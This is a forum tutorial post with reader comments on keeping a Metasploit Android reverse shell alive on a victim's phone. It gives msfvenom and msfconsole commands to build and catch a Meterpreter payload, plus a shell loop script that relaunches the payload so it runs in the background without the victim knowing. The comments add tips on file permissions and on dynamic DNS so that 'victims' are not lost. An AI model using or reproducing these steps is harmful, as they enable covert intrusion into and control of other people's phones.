Hey every one !
i'm going to show you a way to fix your Androids victims even if they close the server app.
Step 1: Make an Android Payload
> msfvenom -p android/meterpreter/reversetcp LHOST=xxx.xxx.xxx LPORT=4444 R > App.apk
lhost = your ip adress
now we got the server file App.apk. send it to the victim and move to step two
Step 2: Start Lestning
start your msfconsole and follow :
> msfconsole
> use exploit/multi/handler
> set PAYLOAD android/meterpreter/reversetcp
> set LHOST xxx.xxx.xxx(ip adress provided when creating the server file)
> set LPORT 4444
> exploit -j
Step 3: Load the Fixing Script
after step 2 a meterpter session should be opend so get up and navigate to where u want to upload the script and i prefer to put it on sdcard
so navigate to sdcard and type:
> upload 'path/to/the/sh/script.sh/
Step 4: Run the Script on the Victim Phone
type :
> shell
> ls
see where is the path of the loaded script then:
> sh script.sh
so even if the victim close the server it's will still runnig in the background with out he know!
-----------------------------------------------------
the script code is
>>#!/bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done <<
save it with a .sh extensions or direct download it from the link attached
----------------------------------------------------------
this is my first arctile i hope u enjoy it and wait for More!
6 Responses
thanks @ImmortalSoul...too few are working on android hacking...must try
I will "lose my victims" as soon as my external IP address will change anyways.
Wont I ?
Don't you need to change the script's permissions before you can execute it on Android? I've had that problem when installing Kali Linux onto my phone and I found two ways around it. Firstly, the script worked when it was executed in the /data/data file, and secondly, if you have root access, "chmod 777 {filename}" always worked.
Thanks for the article
Ninja243
Also, is there any way that I could use DNS with this payload? Google hasn't returned any usable answers yet.
Ninja243
@JOHN BRYCE get noip2 and register on no-ip.com so ur external ip will stay stable !
@Ninja243 u can use the payload with a dns server but u must put the ip adress of the dns not the url to dns, and thnks for your reply
Share Your Thoughts